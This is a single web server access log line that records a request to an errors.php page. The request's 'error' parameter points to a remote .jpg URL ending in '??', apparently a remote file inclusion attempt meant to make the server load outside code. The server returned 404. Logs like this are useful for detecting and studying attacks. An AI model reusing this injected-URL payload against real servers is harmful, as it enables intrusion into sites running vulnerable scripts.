218.38.136.126 - - [14/Feb/2010:07:20:35 -0800] "GET /errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
